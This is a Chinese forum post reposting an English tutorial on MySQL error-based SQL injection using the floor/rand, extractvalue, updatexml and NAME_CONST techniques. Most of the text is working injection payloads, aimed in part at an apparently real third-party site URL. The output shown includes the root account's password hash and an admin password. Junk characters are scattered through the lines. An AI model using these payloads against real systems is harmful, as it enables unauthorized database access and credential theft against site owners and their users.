|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
5 E3 D7 \5 C. a3 a" a) e2 u首先进行正常查询: mysql> select * from article where id = 1;, M- @/ c# X& H# f6 Z
+—-+——-+———+
! t4 j+ h* X" m4 e! B# h3 {5 d# G9 L| id | title | content |" B+ R/ ~: f8 h2 t. u* S. E3 y
+—-+——-+———+
' T6 H& q2 q: F) c9 h9 g8 g; v; D* z| 1 | test | do it |$ B3 o/ \/ I& u2 ]' G
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 M5 X" y0 i7 a; J9 S8 p2 K
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。! c5 W, N: o- `/ x
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
. M" n5 a5 p# v& y: ?ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));: i6 o: O0 X T2 x5 ]8 D
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue3 c4 S* j6 x3 H+ p; \
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–: |3 v4 P- I: u0 G' c
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ * h" Y1 f& [/ b, V& a3 n# c
, W" J+ P- Y: ~( f# s再收集: 4 m1 E* C6 O o9 @( \
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
# f# {* O% @" ?& K- u( K
; T; F- u* e x$ T4 }6 g' U, UError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
4 x3 m8 `8 b9 F& y% e0 s% X* \- m0 ~9 m- h3 i- u
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)0 N# J7 v# R; I* o! T5 |
( B: `" `( i" F+ M
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
% Y% M6 ?8 Y; U) R3 p% W2 w1 S* c; E% d: e. X9 T5 M
MYSQL高版本报错注入技巧-利用NAME_CONST注入
( e" ]% o! t8 Z+ H) `% N4 RIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. $ }- X: c5 o: H, P3 v% e, O
- _* {, i- ~; Q5 j1 k
; F# N, r; W2 Z4 b7 ^0 w7 S相关信息; k- J3 y# p1 e$ A8 A* d
+ R& [/ |" }# p3 k: E0 f
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.$ v% G7 i# i I1 x( z
$ q# j) n( Q* X/ i6 @: o3 W5 aCode:
1 ^8 {5 _/ n& J, o3 q9 s! g, zNAME_CONST(DATA, VALUE)/ ]. _' @) O9 p1 g" r z D
1 m; @0 e9 H& k- oReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) w& n8 K; w" b& ?# n5 }- ?* Q* Q" g1 h
SELECT NAME_CONST('TEST', 1), w7 l7 R5 c, L" U6 d
o& r( @0 X9 t; n" ]- R, Y8 @ o, g2 m8 k6 l
! W- v2 n) m. Y& ` ] c|---------------|
9 P2 I5 m, {) }" L3 {| TEST |
5 i8 y& `, z$ ]& h$ Z5 q! J| |
0 |+ x2 a) p8 A$ C: u+ J- e|---------------|9 g' H% W; l1 H, E+ d) \: m
| 1 |( b" o1 x3 _5 W2 V O
| |
# w0 t6 D9 Q& M# p& X|---------------|
V' \! H3 U+ n, F O3 T3 U6 l0 T$ r; z+ `5 v, z; V% O
) i R8 B3 s) I7 @' H
" a+ s' Z; w! Z* r0 ~0 m
! P6 z: L" E4 Ghttp://dev.mysql.com/doc/refman/5.0/en/m...name-const% J' y8 n( m9 I# X7 h3 C9 u
Intro to MySQL Variables) v$ K, J5 n9 [9 u% M% ^
9 `5 t2 i) T, y7 e
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.1 C4 t0 Q @3 ?* B9 w
6 e( D) v2 l5 c3 _! VCode:2 n$ \1 @( {# u: s9 M& q( y
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2613 y) y9 j5 _5 O( @ S: t+ o
7 R! j; p( Q; y
4 b- S" m4 I- q% @$ X C5 [" M4 |5 c
$ ^6 }% ~5 e* C- `8 q
* x! n: A: _7 t _+ s$ e3 k
Code:# [. @' a1 p B4 b8 @5 j
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--. D4 u4 \6 c$ h4 J7 N
; t0 p. f0 H# D7 i' L
7 J5 Y+ M( y/ |9 Z+ e
VAR = Your MySQL variable.! p3 d3 L( W, \9 [& p6 x
; L2 P: l: W+ ^0 W
MySQL 5.1.3 Server System Variables3 g% n4 a8 D0 I4 s( D4 d! c5 \
$ r$ a. h, }/ M! W( |; l9 G- j
Let's try it out on my site..) K3 v( ~ B) C
' r% Q* i1 N2 c0 pCode:
: i8 c4 m, z9 u+ J3 }! Ihttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
2 o0 r. o( k( ^. _# S3 @3 W3 s0 N/ M% x1 o! E8 ]
Erroruplicate column name '5.0.27-community-nt'
4 n5 V, C1 ~0 j! W' ?
1 x8 B/ t; H% _# S. `
+ e; m) o) [) ~9 r& }+ R5 k# M) D/ ?# T- x% c" s+ c1 j Y$ O T- A8 c
. |% ?) y" H- s
4 u2 h. h. i9 @' j' C& Y U- u0 h9 LNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...9 M( g) u B* [" O1 [. m: s5 H, o
! k% C. _* j8 bData Extraction
5 m) t. ]5 q9 i- X9 | J
" J. `8 _) y; Z. LCode:
$ h; V E+ i, E! Z- u5 \+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
& ^( x+ A( F9 x1 h/ k
' n% Z+ m' t- {2 c
' ]; {, Y5 L+ k/ I- j, JWe should get a duplicate column 1 error...
' x9 d& l6 {$ z! k0 t! l+ K
- \* e( C! n. z" R x: j, d. g$ j2 hCode:) k# C$ z# e4 Y# H5 W' C
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
7 t& A3 L4 x& U) C' c3 X' U, _6 i# X. h
Erroruplicate column name '1
; l7 o% O, x; R) N5 ?" k% }7 }: o
% a5 y. V/ V4 r
, ? W! E; e' j6 g# L) U/ B- d% P9 `/ f, m/ ]
+ V+ w1 j/ @: l) X6 w" ?* _2 u* B7 ]7 e' ^8 A1 h) W
4 q) e1 j2 P3 V& M8 }# m6 E' _; hNow let's get the tables out this bitch..2 c7 E7 D$ O& K$ f$ h
+ w& W; w i' H0 {# B$ D1 X
Code:
0 E t6 h; q4 i* c1 P% L' ~- M+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--. r4 C- r' B6 ~$ X4 X
" u5 V/ Z- \/ |# x! D
, R$ P5 I2 f0 I/ K% V8 hLet's see if it works here, if it does, we can go on and finish the job.
2 H7 D1 o( Q# |; ~- C
! h; ]9 G' t+ W. N0 Y1 ^Code:& y7 m7 D& O1 ~& @) @6 v
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--/ j% }0 z& Y2 k! c9 w( w0 P
. `5 }6 L9 F2 J- Y: o& U
. x( [+ |1 p" @4 {
Erroruplicate column name 'com_admanage
8 v" \6 E$ e" r, q6 ]# l$ B% n; I. L1 V! ~. K
& }* E/ s+ d) v2 j% G6 e9 G
6 f7 {% i# U# ?' i
% G& i- \, p( s
" }6 E" U. R2 {. t2 U' p6 P; q
0 W5 T9 {( K0 f7 y, j
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time./ x0 F3 l7 ^& D" g$ j: L
, s+ g8 H" G. V* D. L8 p( a
Let's get the columns out of the user table..
# ]: |% s" M6 Q; o9 y* F1 c U4 ]; W; F" \( }6 H3 W n8 E
Code:7 r) y* F5 j) n0 z; n3 i# m; Y
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
# S$ r! `: Y1 J! _" e. ~3 a; f& F0 c
2 Z. M& b, r4 o oSo mine looks like this, and I get the duplicate column name 'Host'.* a* `) d1 K; X! |" D; X7 S5 X
& h: m& U4 I" \* o! \- Y7 G
Code:% Q1 f1 N( |- z: h8 W
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--' q. [; O0 ?0 J6 x+ [( i
* m/ R- t' P& }* }- O
Erroruplicate column name 'Host'4 ^5 l2 R& E% s
6 @7 Y$ i/ o5 V' \$ Q. T. ?3 H r% i }" @% _8 G ?- k" W* Y; E
. U/ R7 c1 n9 j" `) @! E6 X2 \4 J( b. K0 p
0 |& i, r3 Y9 T5 Y) E$ k% v/ v, o% R, O z2 ^9 w/ F
Woot, time to finish this bitch off.4 i. J. E2 ~: o9 g; J7 c1 ^. H5 {
+ v! C3 z, o2 T- {
Code:
$ G: A( s9 X Z8 Z7 P9 L6 |$ X O+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
: ?# e0 t; o% }, L( I9 i5 [6 D& _6 \
% _2 R( S0 T2 R/ x* E5 `; E( L% A6 m/ Z1 T
So mine looks like this...; b( E, N6 _7 h; F' |' K
$ I+ |1 y- N' n) E7 O5 x2 _& ICode:
9 h2 M# I3 b# t+ X5 hhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--7 J7 R1 N5 t5 Z! n% D
- L* G$ S5 o: N7 J: F
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
G$ b* X/ ~+ c5 p1 O {) K
9 c$ ]" o9 @+ O. B
3 `# ]* l" K _& a8 e9 j4 e 6 b: L4 f: y1 ?# @1 q ~, a/ b7 A
( l* S5 u) L2 o, j9 | Y, d( @$ E0 j0 U4 \: W" I
( z* f3 ~3 i- I3 xAnd there we have it, thanks for reading.8 f$ W. W" ]/ Z7 h
. i& z& O) ^ {8 i4 c3 u0 U; z
|
发表于 2015-11-11 19:03:37
收藏
支持
反对